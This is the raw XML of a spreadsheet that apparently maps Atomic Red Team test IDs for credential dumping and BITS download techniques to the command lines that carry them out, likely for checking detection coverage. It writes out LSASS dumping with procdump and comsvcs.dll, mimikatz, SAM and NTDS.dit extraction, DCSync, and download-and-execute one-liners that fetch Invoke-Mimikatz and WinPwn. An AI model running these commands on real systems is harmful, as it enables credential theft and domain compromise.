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E4E3B552-A0B9-624A-B45F-2B855616635C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425" r:id="rId12"/>
    <pivotCache cacheId="426" r:id="rId13"/>
    <pivotCache cacheId="427" r:id="rId14"/>
    <pivotCache cacheId="42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<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="260" uniqueCount="214">
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using list)</t>
  </si>
  <si>
    <t>C:\Windows\System32\inetsrv\appcmd.exe list apppool /config</t>
  </si>
  <si>
    <t>Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using config)</t>
  </si>
  <si>
    <t>gsecdump -a</t>
  </si>
  <si>
    <t>Gsecdump</t>
  </si>
  <si>
    <t>$ps = (Get-NetTCPConnection -LocalPort 3389 -State Established -ErrorAction Ignore)
if($ps){$id = $ps[0].OwningProcess} else {$id = (Get-Process svchost)[0].Id }
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump $id $env:TEMP\svchost-exe.dmp full</t>
  </si>
  <si>
    <t>Dump svchost.exe to gather RDP credentials</t>
  </si>
  <si>
    <t>rpcping -s #{server_ip} -e #{custom_port} -a privacy -u NTLM 1&gt;$Null</t>
  </si>
  <si>
    <t>Send NTLM Hash with RPC Test Connection</t>
  </si>
  <si>
    <t>rundll32.exe keymgr,KRShowKeyMgr</t>
  </si>
  <si>
    <t>Dump Credential Manager using keymgr.dll and rundll32.exe</t>
  </si>
  <si>
    <t>procdump.exe  -accepteula -ma lsass.exe C:\Windows\Temp\lsass_dump.dmp</t>
  </si>
  <si>
    <t>Dump LSASS.exe Memory using ProcDump</t>
  </si>
  <si>
    <t>Dump LSASS.exe Memory using comsvcs.dll</t>
  </si>
  <si>
    <t>Dump LSASS.exe Memory using direct system calls and API unhooking</t>
  </si>
  <si>
    <t>Outflank-Dumpert.exe</t>
  </si>
  <si>
    <t>C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full</t>
  </si>
  <si>
    <t>Dump LSASS.exe Memory using Windows Task Manager</t>
  </si>
  <si>
    <t>{"folder": "T1003.001", "url": "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md#atomic-test-5---dump-lsassexe-memory-using-windows-task-manager", "uuid": "dea6c349-f1c6-44f3-87a1-1ed33a59a607"}</t>
  </si>
  <si>
    <t>mimikatz.exe "sekurlsa::minidump %tmp%\lsass.DMP" "sekurlsa::logonpasswords full" exit</t>
  </si>
  <si>
    <t>Offline Credential Theft With Mimikatz</t>
  </si>
  <si>
    <t>pypykatz live lsa</t>
  </si>
  <si>
    <t>LSASS read with pypykatz</t>
  </si>
  <si>
    <t>[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
try{ IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1003.001/src/Out-Minidump.ps1') -ErrorAction Stop}
catch{ $_; exit $_.Exception.Response.StatusCode.Value__}
get-process lsass | Out-Minidump</t>
  </si>
  <si>
    <t>Dump LSASS.exe Memory using Out-Minidump.ps1</t>
  </si>
  <si>
    <t>Create Mini Dump of LSASS.exe using ProcDump</t>
  </si>
  <si>
    <t>procdump.exe -accepteula -mm lsass.exe lsass_dump.dmp</t>
  </si>
  <si>
    <t>Powershell Mimikatz</t>
  </si>
  <si>
    <t>IEX (New-Object Net.WebClient).DownloadString(''https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1); Invoke-Mimikatz -DumpCreds</t>
  </si>
  <si>
    <t>$exePath =  resolve-path "$env:ProgramFiles\dotnet\shared\Microsoft.NETCore.App\5*\createdump.exe"
&amp; "$exePath" -u -f $env:Temp\dotnet-lsass.dmp (Get-Process lsass).id</t>
  </si>
  <si>
    <t>Dump LSASS with createdump.exe from .Net v5</t>
  </si>
  <si>
    <t>if (Test-Path -Path "$env:SystemRoot\System32\rdrleakdiag.exe") {
      $binary_path = "$env:SystemRoot\System32\rdrleakdiag.exe"
  } elseif (Test-Path -Path "$env:SystemRoot\SysWOW64\rdrleakdiag.exe") {
      $binary_path = "$env:SystemRoot\SysWOW64\rdrleakdiag.exe"
  } else {
      $binary_path = "File not found"
      exit 1
  }
$lsass_pid = get-process lsass |select -expand id
if (-not (Test-Path -Path"$env:TEMP\t1003.001-13-rdrleakdiag")) {New-Item -ItemType Directory -Path $env:TEMP\t1003.001-13-rdrleakdiag -Force} 
write-host $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
&amp; $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
Write-Host "Minidump file, minidump_$lsass_pid.dmp can be found inside $env:TEMP\t1003.001-13-rdrleakdiag directory."</t>
  </si>
  <si>
    <t>Dump LSASS.exe using lolbin rdrleakdiag.exe</t>
  </si>
  <si>
    <t>Registry dump of SAM, creds, and secrets</t>
  </si>
  <si>
    <t>Registry parse with pypykatz</t>
  </si>
  <si>
    <t>esentutl.exe /y /vss #{file_path} /d #{copy_dest}/#{file_name}</t>
  </si>
  <si>
    <t>esentutl.exe SAM copy</t>
  </si>
  <si>
    <t>PowerDump Hashes and Usernames from Registry</t>
  </si>
  <si>
    <t>Write-Host "STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON" -fore green
Import-Module "PathToAtomicsFolder\..\ExternalPayloads\PowerDump.ps1"
Invoke-PowerDump</t>
  </si>
  <si>
    <t>for /L %a in (1,1,#{limit}) do @(certutil -f -v -encodehex "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy%a\Windows\System32\config\#{target_hive}" %temp%\#{target_hive}vss%a 2 &gt;nul 2&gt;&amp;1) &amp; dir /B %temp%\#{target_hive}vss*</t>
  </si>
  <si>
    <t>dump volume shadow copy hives with certutil</t>
  </si>
  <si>
    <t>dump volume shadow copy hives with System.IO.File</t>
  </si>
  <si>
    <t>1..#{limit} | % { 
 try { [System.IO.File]::Copy("\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy10\Windows\System32\config\SAM" , "$env:TEMP\#{target_hive}vss$_", "true") } catch {}
 ls "$env:TEMP\SAMvss$_" -ErrorAction Ignore
}</t>
  </si>
  <si>
    <t>iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
samfile -consoleoutput -noninteractive</t>
  </si>
  <si>
    <t>WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes</t>
  </si>
  <si>
    <t>Dumping of SAM, creds, and secrets(Reg Export)</t>
  </si>
  <si>
    <t>test</t>
  </si>
  <si>
    <t>{"uuid": "84113186-ed3c-4d0d-8a3c-8980c86c1f4a"}</t>
  </si>
  <si>
    <t>{"uuid": "0b207037-813c-4444-ac3f-b597cf280a67"}</t>
  </si>
  <si>
    <t>{"uuid": "6c7a4fd3-5b0b-4b30-a93e-39411b25d889"}</t>
  </si>
  <si>
    <t>{"uuid": "96345bfc-8ae7-4b6a-80b7-223200f24ef9"}</t>
  </si>
  <si>
    <t>{"uuid": "0c0f5f06-166a-4f4d-bb4a-719df9a01dbb"}</t>
  </si>
  <si>
    <t>{"uuid": "2536dee2-12fb-459a-8c37-971844fa73be"}</t>
  </si>
  <si>
    <t>{"uuid": "7ae7102c-a099-45c8-b985-4c7a2d05790d"}</t>
  </si>
  <si>
    <t>{"uuid": "453acf13-1dbd-47d7-b28a-172ce9228023"}</t>
  </si>
  <si>
    <t>{"uuid": "c37bc535-5c62-4195-9cc3-0517673171d8"}</t>
  </si>
  <si>
    <t>{"uuid": "6502c8f0-b775-4dbd-9193-1298f56b6781"}</t>
  </si>
  <si>
    <t>t1003.001-t13</t>
  </si>
  <si>
    <t>{"uuid": "47a539d1-61b9-4364-bf49-a68bc2a95ef0"}</t>
  </si>
  <si>
    <t>t1003.001-t11</t>
  </si>
  <si>
    <t>{"uuid": "9d0072c8-7cca-45c4-bd14-f852cfa35cf0"}</t>
  </si>
  <si>
    <t>t1003.001-t10</t>
  </si>
  <si>
    <t>{"uuid": "66fb0bc1-3c3f-47e9-a298-550ecfefacbc"}</t>
  </si>
  <si>
    <t>{"uuid": "21df41be-cdd8-4695-a650-c3981113aa3c"}</t>
  </si>
  <si>
    <t>{"uuid": "0be2230c-9ab3-4ac2-8826-3199b9a0ebf8"}</t>
  </si>
  <si>
    <t>t1003.001-t01</t>
  </si>
  <si>
    <t>t1003.001-t02</t>
  </si>
  <si>
    <t>t1003.001-t03</t>
  </si>
  <si>
    <t>t1003.001-t06</t>
  </si>
  <si>
    <t>t1003.001-t07</t>
  </si>
  <si>
    <t>t1003.001-t08</t>
  </si>
  <si>
    <t>t1003.002-t07</t>
  </si>
  <si>
    <t>t1003.002-t08</t>
  </si>
  <si>
    <t>t1003-t01</t>
  </si>
  <si>
    <t>t1003-t03</t>
  </si>
  <si>
    <t>t1003-t04</t>
  </si>
  <si>
    <t>t1003-t05</t>
  </si>
  <si>
    <t>t1003-t06</t>
  </si>
  <si>
    <t>t1003-t07</t>
  </si>
  <si>
    <t>t1003.002-t06</t>
  </si>
  <si>
    <t>{"uuid": "9d77fed7-05f8-476e-a81b-8ff0472c64d0"}</t>
  </si>
  <si>
    <t>t1003.002-t05</t>
  </si>
  <si>
    <t>t1003.002-t09</t>
  </si>
  <si>
    <t>t1003.002-t04</t>
  </si>
  <si>
    <t>t1003.002-t03</t>
  </si>
  <si>
    <t>t1003.002-t02</t>
  </si>
  <si>
    <t>t1003.002-t01</t>
  </si>
  <si>
    <t>{"uuid": "804f28fc-68fc-40da-b5a2-e9d0bce5c193"}</t>
  </si>
  <si>
    <t>{uuid": "eeb9751a-d598-42d3-b11c-c122d9c3f6c7"}</t>
  </si>
  <si>
    <t>{"uuid": "a96872b2-cbf3-46cf-8eb4-27e8c0e85263"}</t>
  </si>
  <si>
    <t>{"uuid": "a90c2f4d-6726-444e-99d2-a00cd7c20480"}</t>
  </si>
  <si>
    <t>{"uuid": "5c2571d0-1572-416d-9676-812e64ca9f44"}</t>
  </si>
  <si>
    <t>{"uuid": "7cede33f-0acd-44ef-9774-15511300b24b"}</t>
  </si>
  <si>
    <t>{"uuid": "42510244-5019-48fa-a0e5-66c3b76e6049"}</t>
  </si>
  <si>
    <t>{"uuid": "d400090a-d8ca-4be0-982e-c70598a23de9"}</t>
  </si>
  <si>
    <t>Create Volume Shadow Copy with vssadmin</t>
  </si>
  <si>
    <t>t1003.003-t01</t>
  </si>
  <si>
    <t>{"uuid": "dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f"}</t>
  </si>
  <si>
    <t>{"uuid": "c6237146-9ea6-4711-85c9-c56d263a6b03"}</t>
  </si>
  <si>
    <t>t1003.003-t02</t>
  </si>
  <si>
    <t>Copy NTDS.dit from Volume Shadow Copy</t>
  </si>
  <si>
    <t>Dump Active Directory Database with NTDSUtil</t>
  </si>
  <si>
    <t>mkdir C:\Windows\Temp\ntds_T1003
ntdsutil "ac i ntds" "ifm" "create full #{output_folder}" q q</t>
  </si>
  <si>
    <t>t1003.003-t03</t>
  </si>
  <si>
    <t>{"uuid": "2364e33d-ceab-4641-8468-bfb1d7cc2723"}</t>
  </si>
  <si>
    <t>Create Volume Shadow Copy with WMI</t>
  </si>
  <si>
    <t>wmic shadowcopy call create Volume=C:\</t>
  </si>
  <si>
    <t>vssadmin.exe create shadow /for=C:</t>
  </si>
  <si>
    <t>{"uuid": "224f7de0-8f0a-4a94-b5d8-989b036c86da"}</t>
  </si>
  <si>
    <t>t1003.003-t04</t>
  </si>
  <si>
    <t>Create Volume Shadow Copy remotely with WMI</t>
  </si>
  <si>
    <t>wmic /node:&lt;host&gt; shadowcopy call create Volume=C:\</t>
  </si>
  <si>
    <t>t1003.003-t05</t>
  </si>
  <si>
    <t>{"uuid": "d893459f-71f0-484d-9808-ec83b2b64226"}</t>
  </si>
  <si>
    <t>Create Volume Shadow Copy remotely (WMI) with esentutl</t>
  </si>
  <si>
    <t>wmic /node:"#{target_host}" process call create "cmd.exe /c esentutl.exe /y /vss #{source_path} /d #{target_path}"</t>
  </si>
  <si>
    <t>wmic /node:&lt;host&gt; process call create "cmd.exe /c esentutl.exe /y /vss c:\windows\ntds\ntds.dit /d c:\ntds.dit</t>
  </si>
  <si>
    <t>t1003.003-t06</t>
  </si>
  <si>
    <t>{"uuid": "21c7bf80-3e8b-40fa-8f9d-f5b194ff2865"}</t>
  </si>
  <si>
    <t>Create Volume Shadow Copy with Powershell</t>
  </si>
  <si>
    <t>(gwmi -list win32_shadowcopy).Create('C:\','ClientAccessible')</t>
  </si>
  <si>
    <t>t1003.003-t07</t>
  </si>
  <si>
    <t>{"uuid": "542bb97e-da53-436b-8e43-e0a7d31a6c24"}</t>
  </si>
  <si>
    <t>vssadmin.exe create shadow /for=#{drive_letter}
mklink /D #{symlink_path} \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1</t>
  </si>
  <si>
    <t>Create Symlink to Volume Shadow Copy</t>
  </si>
  <si>
    <t>t1003.003-t08</t>
  </si>
  <si>
    <t>{"uuid": "21748c28-2793-4284-9e07-d6d028b66702"}</t>
  </si>
  <si>
    <t>C:\Windows\System32\inetsrv\appcmd.exe list apppool /@t:*
C:\Windows\System32\inetsrv\appcmd.exe list apppool /@text:*
C:\Windows\System32\inetsrv\appcmd.exe list apppool /text:*</t>
  </si>
  <si>
    <t>reg save HKLM\sam %temp%\sam
reg save HKLM\system %temp%\system
reg save HKLM\security %temp%\security</t>
  </si>
  <si>
    <t>reg export HKLM\sam %temp%\sam
reg export HKLM\system %temp%\system
reg export HKLM\security %temp%\security</t>
  </si>
  <si>
    <t>copy #{vsc_name}\Windows\NTDS\NTDS.dit #{extract_path}\ntds.dit
copy #{vsc_name}\Windows\System32\config\SYSTEM #{extract_path}\VSC_SYSTEM_HIVE
reg save HKLM\SYSTEM #{extract_path}\SYSTEM_HIVE</t>
  </si>
  <si>
    <t>mkdir c:\exfil
diskshadow.exe /s diskshadow.txt</t>
  </si>
  <si>
    <t>Create Volume Shadow Copy with diskshadow</t>
  </si>
  <si>
    <t>t1003.003-t09</t>
  </si>
  <si>
    <t>{"uuid": "b385996c-0e7d-4e27-95a4-aca046b119a7"}</t>
  </si>
  <si>
    <t>Dumping LSA Secrets</t>
  </si>
  <si>
    <t>PsExec.exe -accepteula -s reg save HKLM\security\policy\secrets %temp%\secrets /y</t>
  </si>
  <si>
    <t>t1003.004-t01</t>
  </si>
  <si>
    <t>{"uuid": "55295ab0-a703-433b-9ca4-ae13807de12f"}</t>
  </si>
  <si>
    <t>Dump Kerberos Tickets from LSA using dumper.ps1</t>
  </si>
  <si>
    <t>Invoke-Expression (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/MzHmO/Powersh</t>
  </si>
  <si>
    <t>t1003.004-t02</t>
  </si>
  <si>
    <t>{"uuid": "2dfa3bff-9a27-46db-ab75-7faefdaca732"}</t>
  </si>
  <si>
    <t>Cached Credential Dump via Cmdkey</t>
  </si>
  <si>
    <t>cmdkey /list</t>
  </si>
  <si>
    <t>t1003.005-t01</t>
  </si>
  <si>
    <t>{"uuid": "56506854-89d6-46a3-9804-b7fde90791f9"}</t>
  </si>
  <si>
    <t>mimikatz.exe "lsadump::dcsync /domain:#{domain} /user:#{user}@#{domain}" "exit"</t>
  </si>
  <si>
    <t>DCSync (Active Directory)</t>
  </si>
  <si>
    <t>t1003.006-t01</t>
  </si>
  <si>
    <t>{"uuid": "129efd28-8497-4c87-a1b0-73b9a870ca3e"}</t>
  </si>
  <si>
    <t>Run DSInternals Get-ADReplAccount</t>
  </si>
  <si>
    <t>Get-ADReplAccount -All -Server $ENV:logonserver.TrimStart("\")</t>
  </si>
  <si>
    <t>t1003.006-t02</t>
  </si>
  <si>
    <t>{"uuid": "a0bced08-3fc5-4d8b-93b7-e8344739376e"}</t>
  </si>
  <si>
    <t>bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md %temp%\bitsadmin1_flag.ps1</t>
  </si>
  <si>
    <t>Bitsadmin Download (cmd)</t>
  </si>
  <si>
    <t>t1197-t01</t>
  </si>
  <si>
    <t>{"uuid": "3c73d728-75fb-4180-a12f-6712864d7421"}</t>
  </si>
  <si>
    <t>Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md -Destination $env:TEMP\bitsadmin2_flag.ps1</t>
  </si>
  <si>
    <t>Bitsadmin Download (PowerShell)</t>
  </si>
  <si>
    <t>{"uuid": "f63b8bc4-07e5-4112-acba-56f646f3f0bc"}</t>
  </si>
  <si>
    <t>t1197-t02</t>
  </si>
  <si>
    <t>Persist, Download, &amp; Execute</t>
  </si>
  <si>
    <t>bitsadmin.exe /create &lt;bits_job_name&gt;
bitsadmin.exe /addfile &lt;bits_job_name&gt; &lt;remote_file&gt; &lt;local_file&gt;
bitsadmin.exe /setnotifycmdline &lt;bits_job_name&gt; &lt;command_path&gt; NULL
bitsadmin.exe /resume &lt;bits_job_name&gt;
ping -n 5 127.0.0.1 &gt;nul 2&gt;&amp;1
bitsadmin.exe /complete &lt;bits_job_name&gt;</t>
  </si>
  <si>
    <t>t1197-t03</t>
  </si>
  <si>
    <t>{"uuid": "62a06ec5-5754-47d2-bcfc-123d8314c6ae"}</t>
  </si>
  <si>
    <t>Bits download using desktopimgdownldr.exe (cmd)</t>
  </si>
  <si>
    <t>set SYSTEMROOT=C:\Windows\Temp &amp;&amp; cmd /c desktopimgdownldr.exe /lockscreenurl:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md /eventName:desktopimgdownldr</t>
  </si>
  <si>
    <t>t1197-t04</t>
  </si>
  <si>
    <t>{"uuid": "afb5e09e-e385-4dee-9a94-6ee60979d114"}</t>
  </si>
  <si>
    <t>process_account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</si>
</sst>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4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4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4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M43" totalsRowShown="0" headerRowDxfId="20">
  <autoFilter ref="A1:M43" xr:uid="{B6B8DB85-BB20-8546-B15A-D0F5310E33C2}"/>
  <sortState xmlns:xlrd2="http://schemas.microsoft.com/office/spreadsheetml/2017/richdata2" ref="A2:M33">
    <sortCondition ref="L1:L33"/>
  </sortState>
  <tableColumns count="13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wmic /node:&quot;#{target_host}&quot; process call create &quot;cmd.exe /c esentutl.exe /y /vss #{source_path} /d #{target_path}&quot;" dataDxfId="19"/>
    <tableColumn id="7" xr3:uid="{BBA3C39C-E28D-CE4E-8522-1B64FD909BC1}" name="initiating_process_cmdline" dataDxfId="18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7"/>
    <tableColumn id="12" xr3:uid="{B696AE98-F833-4348-8A2A-083681C93892}" name="process_account"/>
    <tableColumn id="13" xr3:uid="{DEC979B5-A396-F945-A221-01278C4EA968}" name="object"/>
    <tableColumn id="2" xr3:uid="{5E711B7D-ECDB-7046-8B8E-DD3FAE345EC0}" name="test"/>
    <tableColumn id="14" xr3:uid="{768D574A-4DC6-E84B-8CD2-121E544083BD}" name="ns_meta" dataDxfId="1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5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4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3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2"/>
    <tableColumn id="4" xr3:uid="{593E9916-B818-E948-9CB0-FF14679B05EF}" name="file_action"/>
    <tableColumn id="5" xr3:uid="{130E5943-D692-AB4C-A424-2D854D4233D6}" name="file_path" dataDxfId="11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0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9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8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7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6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5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4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3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2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1"/>
    <tableColumn id="8" xr3:uid="{FD2FD0D2-F1F6-2A43-BA6C-F5FD6E6C80ED}" name="ns_met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M43"/>
  <sheetViews>
    <sheetView tabSelected="1" topLeftCell="D1" workbookViewId="0">
      <pane ySplit="1" topLeftCell="A20" activePane="bottomLeft" state="frozen"/>
      <selection pane="bottomLeft" activeCell="J22" sqref="J22"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultRowHeight="16" x14ac:dyDescent="0.2"/>
  <cols>
    <col min="1" max="1" width="13" bestFit="1" customWidth="1"/>
    <col min="2" max="2" width="21.83203125" customWidth="1"/>
    <col min="3" max="3" width="66" bestFit="1" customWidth="1"/>
    <col min="4" max="4" width="166.1640625" customWidth="1"/>
    <col min="5" max="5" width="26.33203125" bestFit="1" customWidth="1"/>
    <col min="6" max="6" width="15.83203125" customWidth="1"/>
    <col min="7" max="7" width="24.33203125" bestFit="1" customWidth="1"/>
    <col min="8" max="8" width="14.83203125" bestFit="1" customWidth="1"/>
    <col min="9" max="9" width="23.1640625" style="1" bestFit="1" customWidth="1"/>
    <col min="10" max="10" width="17.83203125" bestFit="1" customWidth="1"/>
    <col min="11" max="11" width="8.83203125" bestFit="1" customWidth="1"/>
    <col min="12" max="12" width="15.33203125" customWidth="1"/>
    <col min="13" max="13" width="45" style="1" bestFit="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:13" ht="17" x14ac:dyDescent="0.2">
      <c r="A1" s="4" t="s">
        <v>6</v>
      </c>
      <c r="B1" s="4" t="s">
        <v>0</v>
      </c>
      <c r="C1" s="4" t="s">
        <v>8</v>
      </c>
      <c r="D1" s="4" t="s">
        <v>157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213</v>
      </c>
      <c r="K1" s="4" t="s">
        <v>31</v>
      </c>
      <c r="L1" s="4" t="s">
        <v>88</v>
      </c>
      <c r="M1" s="5" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="2" spans="1:13" ht="17" x14ac:dyDescent="0.2">
      <c r="A2" s="1"/>
      <c r="C2" t="s">
        <v>46</v>
      </c>
      <c r="D2" s="1" t="s">
        <v>45</v>
      </c>
      <c r="E2" s="1"/>
      <c r="L2" t="s">
        <v>115</v>
      </c>
      <c r="M2" s="1" t="s">
        <v>92</v>
      </c>
    </row>
    <row r="3" spans="1:13" ht="51" x14ac:dyDescent="0.2">
      <c r="A3" s="1"/>
      <c r="C3" t="s">
        <v>48</v>
      </c>
      <c r="D3" s="1" t="s">
        <v>47</v>
      </c>
      <c r="E3" s="1"/>
      <c r="L3" t="s">
        <v>116</v>
      </c>
      <c r="M3" s="1" t="s">
        <v>136</v>
      </c>
    </row>
    <row r="4" spans="1:13" ht="51" x14ac:dyDescent="0.2">
      <c r="A4" s="1"/>
      <c r="C4" t="s">
        <v>42</v>
      </c>
      <c r="D4" s="1" t="s">
        <v>169</v>
      </c>
      <c r="E4" s="1"/>
      <c r="L4" t="s">
        <v>117</v>
      </c>
      <c r="M4" s="1" t="s">
        <v>91</v>
      </c>
    </row>
    <row r="5" spans="1:13" ht="17" x14ac:dyDescent="0.2">
      <c r="A5" s="1"/>
      <c r="C5" t="s">
        <v>44</v>
      </c>
      <c r="D5" s="1" t="s">
        <v>43</v>
      </c>
      <c r="E5" s="1"/>
      <c r="L5" t="s">
        <v>118</v>
      </c>
      <c r="M5" s="1" t="s">
        <v>135</v>
      </c>
    </row>
    <row r="6" spans="1:13" ht="17" x14ac:dyDescent="0.2">
      <c r="C6" t="s">
        <v>52</v>
      </c>
      <c r="D6" s="1" t="s">
        <v>51</v>
      </c>
      <c r="E6" s="1"/>
      <c r="L6" t="s">
        <v>119</v>
      </c>
      <c r="M6" s="1" t="s">
        <v>89</v>
      </c>
    </row>
    <row r="7" spans="1:13" ht="17" x14ac:dyDescent="0.2">
      <c r="C7" t="s">
        <v>50</v>
      </c>
      <c r="D7" s="1" t="s">
        <v>49</v>
      </c>
      <c r="E7" s="1"/>
      <c r="L7" t="s">
        <v>120</v>
      </c>
      <c r="M7" s="1" t="s">
        <v>90</v>
      </c>
    </row>
    <row r="8" spans="1:13" ht="17" x14ac:dyDescent="0.2">
      <c r="C8" t="s">
        <v>54</v>
      </c>
      <c r="D8" s="1" t="s">
        <v>53</v>
      </c>
      <c r="E8" s="1"/>
      <c r="L8" t="s">
        <v>107</v>
      </c>
      <c r="M8" s="1" t="s">
        <v>106</v>
      </c>
    </row>
    <row r="9" spans="1:13" ht="17" x14ac:dyDescent="0.2">
      <c r="C9" t="s">
        <v>55</v>
      </c>
      <c r="D9" s="1" t="s">
        <v>58</v>
      </c>
      <c r="E9" s="1"/>
      <c r="L9" t="s">
        <v>108</v>
      </c>
      <c r="M9" s="1" t="s">
        <v>94</v>
      </c>
    </row>
    <row r="10" spans="1:13" ht="17" x14ac:dyDescent="0.2">
      <c r="C10" t="s">
        <v>56</v>
      </c>
      <c r="D10" s="1" t="s">
        <v>57</v>
      </c>
      <c r="E10" s="1"/>
      <c r="L10" t="s">
        <v>109</v>
      </c>
      <c r="M10" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="11" spans="1:13" ht="17" x14ac:dyDescent="0.2">
      <c r="C11" t="s">
        <v>62</v>
      </c>
      <c r="D11" s="1" t="s">
        <v>61</v>
      </c>
      <c r="E11" s="1"/>
      <c r="L11" t="s">
        <v>110</v>
      </c>
      <c r="M11" s="1" t="s">
        <v>96</v>
      </c>
    </row>
    <row r="12" spans="1:13" ht="17" x14ac:dyDescent="0.2">
      <c r="C12" t="s">
        <v>64</v>
      </c>
      <c r="D12" s="1" t="s">
        <v>63</v>
      </c>
      <c r="E12" s="1"/>
      <c r="L12" t="s">
        <v>111</v>
      </c>
      <c r="M12" s="1" t="s">
        <v>97</v>
      </c>
    </row>
    <row r="13" spans="1:13" ht="85" x14ac:dyDescent="0.2">
      <c r="C13" t="s">
        <v>66</v>
      </c>
      <c r="D13" s="1" t="s">
        <v>65</v>
      </c>
      <c r="E13" s="1"/>
      <c r="L13" t="s">
        <v>112</v>
      </c>
      <c r="M13" s="1" t="s">
        <v>98</v>
      </c>
    </row>
    <row r="14" spans="1:13" ht="34" x14ac:dyDescent="0.2">
      <c r="C14" t="s">
        <v>69</v>
      </c>
      <c r="D14" s="1" t="s">
        <v>70</v>
      </c>
      <c r="E14" s="1"/>
      <c r="L14" t="s">
        <v>103</v>
      </c>
      <c r="M14" s="1" t="s">
        <v>104</v>
      </c>
    </row>
    <row r="15" spans="1:13" ht="34" x14ac:dyDescent="0.2">
      <c r="C15" t="s">
        <v>72</v>
      </c>
      <c r="D15" s="1" t="s">
        <v>71</v>
      </c>
      <c r="E15" s="1"/>
      <c r="L15" t="s">
        <v>101</v>
      </c>
      <c r="M15" s="1" t="s">
        <v>102</v>
      </c>
    </row>
    <row r="16" spans="1:13" ht="221" x14ac:dyDescent="0.2">
      <c r="C16" t="s">
        <v>74</v>
      </c>
      <c r="D16" s="1" t="s">
        <v>73</v>
      </c>
      <c r="E16" s="1"/>
      <c r="L16" t="s">
        <v>99</v>
      </c>
      <c r="M16" s="1" t="s">
        <v>100</v>
      </c>
    </row>
    <row r="17" spans="3:13" ht="51" x14ac:dyDescent="0.2">
      <c r="C17" t="s">
        <v>75</v>
      </c>
      <c r="D17" s="1" t="s">
        <v>170</v>
      </c>
      <c r="E17" s="1"/>
      <c r="L17" t="s">
        <v>128</v>
      </c>
      <c r="M17" s="1" t="s">
        <v>133</v>
      </c>
    </row>
    <row r="18" spans="3:13" ht="17" x14ac:dyDescent="0.2">
      <c r="C18" t="s">
        <v>76</v>
      </c>
      <c r="D18" s="1" t="s">
        <v>63</v>
      </c>
      <c r="E18" s="1"/>
      <c r="L18" t="s">
        <v>127</v>
      </c>
      <c r="M18" s="1" t="s">
        <v>131</v>
      </c>
    </row>
    <row r="19" spans="3:13" ht="17" x14ac:dyDescent="0.2">
      <c r="C19" t="s">
        <v>78</v>
      </c>
      <c r="D19" s="1" t="s">
        <v>77</v>
      </c>
      <c r="E19" s="1"/>
      <c r="L19" t="s">
        <v>126</v>
      </c>
      <c r="M19" s="1" t="s">
        <v>132</v>
      </c>
    </row>
    <row r="20" spans="3:13" ht="51" x14ac:dyDescent="0.2">
      <c r="C20" t="s">
        <v>79</v>
      </c>
      <c r="D20" s="1" t="s">
        <v>80</v>
      </c>
      <c r="E20" s="1"/>
      <c r="L20" t="s">
        <v>125</v>
      </c>
      <c r="M20" s="1" t="s">
        <v>129</v>
      </c>
    </row>
    <row r="21" spans="3:13" ht="34" x14ac:dyDescent="0.2">
      <c r="C21" t="s">
        <v>82</v>
      </c>
      <c r="D21" s="1" t="s">
        <v>81</v>
      </c>
      <c r="E21" s="1"/>
      <c r="L21" t="s">
        <v>123</v>
      </c>
      <c r="M21" s="1" t="s">
        <v>130</v>
      </c>
    </row>
    <row r="22" spans="3:13" ht="68" x14ac:dyDescent="0.2">
      <c r="C22" t="s">
        <v>83</v>
      </c>
      <c r="D22" s="1" t="s">
        <v>84</v>
      </c>
      <c r="E22" s="1"/>
      <c r="L22" t="s">
        <v>121</v>
      </c>
      <c r="M22" s="1" t="s">
        <v>122</v>
      </c>
    </row>
    <row r="23" spans="3:13" ht="34" x14ac:dyDescent="0.2">
      <c r="C23" t="s">
        <v>86</v>
      </c>
      <c r="D23" s="1" t="s">
        <v>85</v>
      </c>
